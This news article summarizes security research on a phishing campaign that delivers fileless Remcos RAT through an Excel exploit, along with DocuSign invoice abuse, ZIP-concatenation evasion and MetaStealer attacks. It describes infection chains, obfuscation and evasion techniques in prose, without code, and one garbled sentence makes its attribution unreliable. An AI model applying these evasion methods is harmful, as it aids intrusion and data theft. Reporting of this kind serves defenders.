Cybercriminals Spread Fileless Remcos RAT Malware via an Excel Exploit

0
61
Cybercriminals Spread Fileless Remcos RAT Malware via an Excel Exploit
Cybercriminals Spread Fileless Remcos RAT Malware via an Excel Exploit

Researchers studying cybersecurity have uncovered a new phishing effort that disseminates Remcos RAT, a fileless version of well-known commercial malware.

Researchers Xiaopeng Zhang and Remcos RAT “provide purchases with a wide range of advanced features to remotely control computers belonging to the buyer,” according to a report released last week by Fortinet FortiGuard Labs.

“However, threat actors have abused Remcos to collect sensitive information from victims and remotely control their computers to perform further malicious acts.”

The assault begins with a phishing email that entices users to open a Microsoft Excel attachment by using lures related to purchase orders.

The malicious Excel document downloads an HTML Application (HTA) file (“cookienetbookinetcahce.hta”) from a remote server (“192.3.220[.]22”) and launches it using mshta.exe by taking advantage of a known remote code execution vulnerability in Office (CVE-2017-0199, CVSS score: 7.8).

To avoid detection, the HTA file is encased in several layers of PowerShell, JavaScript, and Visual Basic Script code. Its primary duty is to obtain and run an executable file from the same server.

In order to make detection more difficult, the malware then uses a variety of anti-analysis and anti-debugging measures in addition to running another obfuscated PowerShell program. In order to download and execute Remcos RAT, the malicious code next uses process hollowing.

“Rather than saving the Remcos file into a local file and running it, it directly deploys Remcos in the current process’s memory,” Zhang said. “In other words, it is a fileless variant of Remcos.”

Remcos RAT may remotely carry out commands sent by the attacker via a command-and-control (C2) server and is capable of gathering a variety of data from the compromised host, including system metadata.

With the help of these commands, the program can harvest files, list and end processes, control system services, modify the Windows Registry, run commands and scripts, take screenshots, change the desktop wallpaper of a victim, activate the camera and microphone, download more payloads, record the screen, and even turn off keyboard and mouse input.

The disclosure follows Wallarm’s revelation that threat actors are utilizing Docusign APIs to send phony invoices that look real in an effort to trick unwary consumers and carry out extensive phishing campaigns.

In order to update templates and utilize the API directly, the attackers must first create a genuine, paid Docusign account. The accounts are then used to generate specially designed invoice templates that imitate demands from popular companies, such as Norton Antivirus, to e-sign papers.

“Unlike traditional phishing scams that rely on deceptively crafted emails and malicious links, these incidents use genuine DocuSign accounts and templates to impersonate reputable companies, catching users and security tools off guard,” the company said.

“If users e-sign this document, the attacker can use the signed document to request payment from the organization outside of DocuSign or send the signed document through DocuSign to the finance department for payment.”

Another unusual technique used by phishing campaigns to get around security systems and spread remote access trojans to targets is ZIP file concatenation.

The technique entails appending several ZIP archives to a single file, which creates security risks because different programs, such as 7-Zip, WinRAR, and Windows File Explorer, unpack and parse these files differently, potentially ignoring malicious payloads.

“By exploiting the different ways ZIP readers and archive managers process concatenated ZIP files, attackers can embed malware that specifically targets users of certain tools,” Perception Point noted in a recent report.

“Threat actors know these tools will often miss or overlook the malicious content hidden within concatenated archives, allowing them to deliver their payload undetected and target users who use a specific program to work with archives.”

The development also coincides with a threat actor called Venture Wolf being connected to phishing assaults using MetaStealer, a variant of the RedLine Stealer virus, that target the Russian IT, telecommunications, construction, and manufacturing industries.

Also readViksit Workforce for a Viksit Bharat

Do FollowCIO News LinkedIn Account | CIO News Facebook | CIO News Youtube | CIO News Twitter 

About us:

CIO News is the premier platform dedicated to delivering the latest news, updates, and insights from the CIO industry. As a trusted source in the technology and IT sector, we provide a comprehensive resource for executives and professionals seeking to stay informed and ahead of the curve. With a focus on cutting-edge developments and trends, CIO News serves as your go-to destination for staying abreast of the rapidly evolving landscape of technology and IT. Founded in June 2020, CIO News has rapidly evolved with ambitious growth plans to expand globally, targeting markets in the Middle East & Africa, ASEAN, USA, and the UK.